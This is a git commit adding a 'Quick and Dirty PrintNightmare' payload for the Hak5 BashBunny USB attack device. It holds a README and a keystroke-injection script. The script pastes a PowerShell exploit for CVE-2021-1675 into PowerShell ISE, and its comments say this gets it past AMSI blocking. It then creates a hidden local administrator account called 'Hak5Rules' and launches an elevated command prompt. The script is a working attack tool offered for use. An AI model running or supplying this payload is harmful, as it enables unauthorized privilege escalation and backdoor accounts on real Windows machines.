Quick and Dirty PrintNightmare Payload (#432)

* New Payload Added new PrintNightmare Payload (Quick and dirty) * Fixed my potty mouth I'm a child sometimes * Renamed Payload * PrintNightmare: Use SWITCH_POSITION in payload path * Fixing a typo Co-authored-by: Marc <foxtrot@malloc.me>
2021-07-05 01:27:46 +01:00 · 2021-07-05 01:27:46 +01:00 · 73ca91c3ba
parent 829a4db6b2
commit 73ca91c3ba
3 changed files with 596 additions and 0 deletions
--- a/payloads/library/execution/PrintNightmare/README.md
+++ b/payloads/library/execution/PrintNightmare/README.md
@ -0,0 +1,7 @@
+# PrintNightmare-BB-Payload
+PrintNightmare Payload for the Hak5 BashBunny
+Building a quick and dirty condenced verison of https://github.com/calebstewart/CVE-2021-1675 for the Hak5 BashBunny
+
+Note that it's set to GB for my language, set to yours so you get the correct \'s when copying the text file to clipboard.
+
+Other than that it creates the function for Invoke-Nightmare and then uses that to create our Hak5Rules user (which is an admin) and then launches CMD as said admin.
--- a/payloads/library/execution/PrintNightmare/juicybit.txt
+++ b/payloads/library/execution/PrintNightmare/juicybit.txt
--- a/payloads/library/execution/PrintNightmare/payload.txt
+++ b/payloads/library/execution/PrintNightmare/payload.txt
@ -0,0 +1,66 @@
+# Title:         Quick and Dirty PrintNightmare
+# Author:        PanicAcid
+# Version:       1.0
+#
+# Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator
+# As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole
+# thing!
+# Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and
+# Foxtrot for putting up with my nonsense.
+#
+# Purple.............Loading
+# Green .............Execute
+# Off................Finished
+#
+#!/bin/bash
+
+# OPTIONS - More options available in the Powershell payload
+OBFUSCATECMD="N" # Y=yes or N=no
+
+#-----------------------------------
+# Purple LED - initializing
+LED SETUP
+
+GET SWITCH_POSITION
+DUCKY_LANG gb
+
+# Attackmode HID
+ATTACKMODE HID STORAGE
+
+#-----------------------------------
+# Green LED - executing credential_powershell
+LED STAGE1
+QUACK GUI r
+QUACK DELAY 300
+QUACK STRING powershell.exe
+QUACK ENTER
+QUACK DELAY 100
+QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))"
+QUACK ENTER
+QUACK GUI r
+QUACK DELAY 300
+QUACK STRING powershell_ise.exe
+QUACK ENTER
+QUACK DELAY 4000
+QUACK CONTROL d
+QUACK CONTROL v
+QUACK CONTROL d
+QUACK ENTER
+QUACK STRING "Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'"
+QUACK ENTER
+QUACK ALT F4
+QUACK GUI r
+QUACK DELAY 150
+QUACK STRING cmd
+QUACK DELAY 150
+QUACK ENTER
+QUACK DELAY 150
+QUACK STRING runas /user:Hak5Rules cmd.exe
+QUACK ENTER
+QUACK DELAY 150
+QUACK STRING Hak5Rules
+QUACK DELAY 150
+QUACK ENTER
+#-----------------------------------
+# Kill the lights - finished
+LED FINISH